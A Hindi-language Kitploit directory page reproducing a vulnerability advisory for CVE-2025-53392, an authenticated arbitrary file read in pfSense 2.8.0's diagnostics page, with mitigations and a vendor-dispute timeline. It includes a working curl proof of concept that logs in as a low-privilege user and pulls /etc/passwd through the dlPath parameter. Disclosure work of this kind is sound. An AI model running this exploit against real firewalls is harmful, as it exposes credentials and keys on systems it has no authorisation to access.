Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/skraft9/pfsense-security-research
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubskraft9/pfsense-security-research

pfsense-security-research

प्रमाणित मनमाना फ़ाइल पढ़ना pfSense 2.8.0 में डायग्नोस्टिक्स वेब इंटरफ़ेस के माध्यम से (CVE-2025-53392)

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
147 महीने पहलेअभी तक समीक्षित नहीं

pfSense 2.8.0 में डायग्नोस्टिक्स वेब इंटरफ़ेस के माध्यम से प्रमाणित मनमाना फ़ाइल पढ़ना

CVE ID: CVE-2025-53392

दिनांक: 2025-06-27

लेखक: Seth Kraft

विक्रेता होमपेज: https://www.netgate.com/

विक्रेता परिवर्तन सूची: https://docs.netgate.com/pfsense/en/latest/releases/

सॉफ़्टवेयर लिंक: https://www.pfsense.org/download/

संस्करण: pfSense CE 2.8.0

CWE ID: CWE-36 (पूर्ण पथ भ्रामण)

CVSS आधार स्कोर: 6.5 (मध्यम)

वेक्टर: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

प्रकार: प्रमाणित मनमाना फ़ाइल पढ़ना / स्थानीय फ़ाइल खुलासा


प्राधिकरण

केवल अधिकृत परीक्षण और अनुसंधान प्रयोजनों के लिए। उन सिस्टमों पर इस भेद्यता का परीक्षण या शोषण न करें जिनके आप स्वामी नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है।


सारांश

pfSense CE 2.8.0 में डायग्नोस्टिक्स पृष्ठ diag_command.php में एक स्थानीय फ़ाइल खुलासा भेद्यता है, जो प्रमाणित उपयोगकर्ताओं को अंतर्निहित फ़ाइल सिस्टम से मनमानी फ़ाइलें डाउनलोड करने की अनुमति देती है।

इस कार्यक्षमता में अनुमति असाइनमेंट के अलावा किसी भी पथ स्वच्छता, निर्देशिका प्रतिबंध या पहुँच नियंत्रण का अभाव है।


विवरण

भेद्य तर्क फ़ाइल src/usr/local/www/diag_command.php में स्थित है:

root@kitploit:~
if ($_POST['submit'] == "DOWNLOAD" && file_exists($_POST['dlPath'])) {
    session_cache_limiter('public');
    send_user_download('file', $_POST['dlPath']);
}

उपयोगकर्ता-नियंत्रित dlPath पैरामीटर पर कोई सुरक्षा जाँच या स्वच्छता उपाय लागू नहीं किए गए हैं।

PHP प्रक्रिया द्वारा पढ़ी जा सकने वाली कोई भी फ़ाइल पथ उपयोगकर्ता को वापस परोसा जाएगा।


प्रूफ ऑफ कॉन्सेप्ट

low-priv समूह बनाएँ और एक एकल विशेषाधिकार निर्दिष्ट करें (WebCfg - Diagnostics: Command) Screenshot 2025-06-27 133201

जबकि मैं WebCfg - Diagnostics: Command विशेषाधिकार के लिए एक सुरक्षा अस्वीकरण की उपस्थिति स्वीकार करता हूँ, अस्वीकरण अकेले ध्वनि पहुँच नियंत्रण को प्रतिस्थापित नहीं करते।

वाक्यांश "Allow access to the Diagnostics Command page" अस्पष्ट है और जोखिम को कम करके आंकता है, यह केवल डायग्नोस्टिक पहुँच नहीं, बल्कि अप्रतिबंधित रूट-स्तरीय कमांड निष्पादन सक्षम करता है।

वेब इंटरफ़ेस में विशेषाधिकार लेबल को उन कार्यों के दायरे और गंभीरता को सटीक रूप से प्रतिबिंबित करना चाहिए जिनकी वे अनुमति देते हैं, विशेष रूप से जब वे पूर्ण प्रशासनिक नियंत्रण को उजागर करते हैं।

low-priv समूह को dev उपयोगकर्ता को असाइन करें Screenshot 2025-06-27 133218

यह प्रूफ ऑफ कॉन्सेप्ट दर्शाता है कि केवल WebCfg - Diagnostics: Command अनुमति वाला उपयोगकर्ता अस्वच्छ dlPath पैरामीटर का दुरुपयोग करके /etc/passwd को निकाल सकता है।

root@kitploit:~
# 1. Start session and extract CSRF token
curl -k -c cookies.txt -s https://<IP>/diag_command.php > login_page.html
csrf_token=$(grep '__csrf_magic' login_page.html | grep 'value=' | sed -E 's/.*value="([^"]+)".*/\1/')

# 2. Authenticate as low-privileged user "dev"
curl -k -b cookies.txt -c cookies.txt \
  -d "__csrf_magic=$csrf_token" \
  -d "usernamefld=dev" \
  -d "passwordfld=pass" \
  -d "login=Sign+In" \
  https://<IP>/index.php > /dev/null

# 3. Get CSRF token post-login
curl -k -b cookies.txt -s https://<IP>/diag_command.php > diag_authed.html
csrf_token=$(grep '__csrf_magic' diag_authed.html | grep 'value=' | sed -E 's/.*value="([^"]+)".*/\1/')

# 4. Exfiltrate arbitrary file (example: /etc/passwd)
curl -k -b cookies.txt -s -X POST https://<IP>/diag_command.php \
  -d "__csrf_magic=$csrf_token" \
  -d "submit=DOWNLOAD" \
  -d "dlPath=/etc/passwd"

डेमो

pfSense-authenticated-file-disclosure-poc


प्रभाव

WebCfg - Diagnostics: Command विशेषाधिकार वाला कोई भी pfSense उपयोगकर्ता निम्न कर सकता है:

  • संवेदनशील स्थानीय सिस्टम फ़ाइलें पढ़ना
  • बैकअप, क्रेडेंशियल और कुंजियाँ निकालना
  • अपने इच्छित अनुमतियों से कहीं अधिक फ़ाइलों तक पहुँचना

यह कम से कम विशेषाधिकार के सिद्धांत का उल्लंघन करता है और तार्किक विशेषाधिकार सीमाओं को तोड़ता है।


सुझाए गए शमन

  1. dlPath को realpath() और उपसर्ग प्रवर्तन का उपयोग करके एक सुरक्षित आधार निर्देशिका (जैसे /tmp) तक प्रतिबंधित करें
  2. .. या पूर्ण पथ वाले पथों को हटाएँ या ब्लॉक करें
  3. केवल एक सुरक्षित सूची या अस्थायी आर्टिफैक्ट निर्देशिका में फ़ाइलों के डाउनलोड की अनुमति दें

खुलासा समयरेखा

  • 2025-06-26: भेद्यता Netgate को सूचित की गई
  • 2025-06-27: Netgate ने उत्तर दिया, मुद्दे को इच्छित व्यवहार बताकर खारिज कर दिया
  • 2025-06-27: शोधकर्ता ने तकनीकी खंडन के साथ जवाब दिया, विक्रेता ने खारिज करना दोहराया
  • 2025-06-27: शोधकर्ता ने अंतिम विक्रेता खारिज के कारण सार्वजनिक खुलासा शुरू किया, MITRE से CVE असाइनमेंट का अनुरोध किया
  • 2025-06-28: MITRE ने विक्रेता विवादित टैग के साथ CVE-2025-53392 असाइन किया

Netgate से प्रतिक्रिया

जबकि विक्रेता दावा करता है कि इस पृष्ठ तक पहुँच रूट के बराबर है, यह वेब-स्तरीय अनुमतियों को अप्रतिबंधित बैकएंड पहुँच के साथ भ्रमित करता है।

विशेषाधिकार को तकनीकी रूप से लागू किया जाना चाहिए (न कि मान लिया जाना चाहिए) और यूआई में चेतावनियाँ सुरक्षित डिज़ाइन का कोई विकल्प नहीं हैं।


विक्रेता के दावे को चुनौती देते हुए कि यह कार्यक्षमता "अच्छी तरह से प्रलेखित" है - मुझे pfSense के उपयोगकर्ता विशेषाधिकार दस्तावेज़ीकरण में कोई उल्लेख नहीं मिला जो यह बताता हो कि WebCfg - Diagnostics: Command अनुमति रूट-स्तरीय पहुँच के बराबर है। Screenshot 2025-06-28 235613


विक्रेता संभवतः Diagnostics Command पृष्ठ का उल्लेख कर रहा होगा, जिसमें दुरुपयोग के बारे में एक सामान्य चेतावनी शामिल है।

लेकिन दस्तावेज़ीकरण इस कार्यक्षमता को WebCfg - Diagnostics: Command विशेषाधिकार से स्पष्ट रूप से नहीं जोड़ता है या यह स्पष्ट नहीं करता है कि यह रूट-स्तरीय पहुँच प्रदान करता है।


डायग्नोस्टिक इंटरफ़ेस के लिए सुरक्षा अपेक्षाएँ

फ़ायरवॉल के वेब इंटरफ़ेस के भीतर डायग्नोस्टिक मॉड्यूल में अंतर्निहित ऑपरेटिंग सिस्टम के विरुद्ध दुरुपयोग को रोकने के लिए उचित सुरक्षा उपाय होने चाहिए।

  • डायग्नोस्टिक कमांड कार्यात्मक रूप से ping, traceroute, log view, आदि तक सीमित होने चाहिए।
  • कमांड एक प्रतिबंधित शेल या chroot के अंदर चलने चाहिए।
  • फ़ाइल पहुँच को स्पष्ट रूप से सुरक्षित निर्देशिकाओं (/tmp, /var/log) तक सीमित किया जाना चाहिए।
  • अनुमतियाँ सूक्ष्म-स्तर और दायरे में स्पष्ट होनी चाहिए।

अस्वीकरण

यह कार्य मेरे रोज़गार के बाहर किया गया था और साइबर सुरक्षा अनुसंधान में मेरे व्यक्तिगत प्रयासों को दर्शाता है।


टूल डाउनलोड करें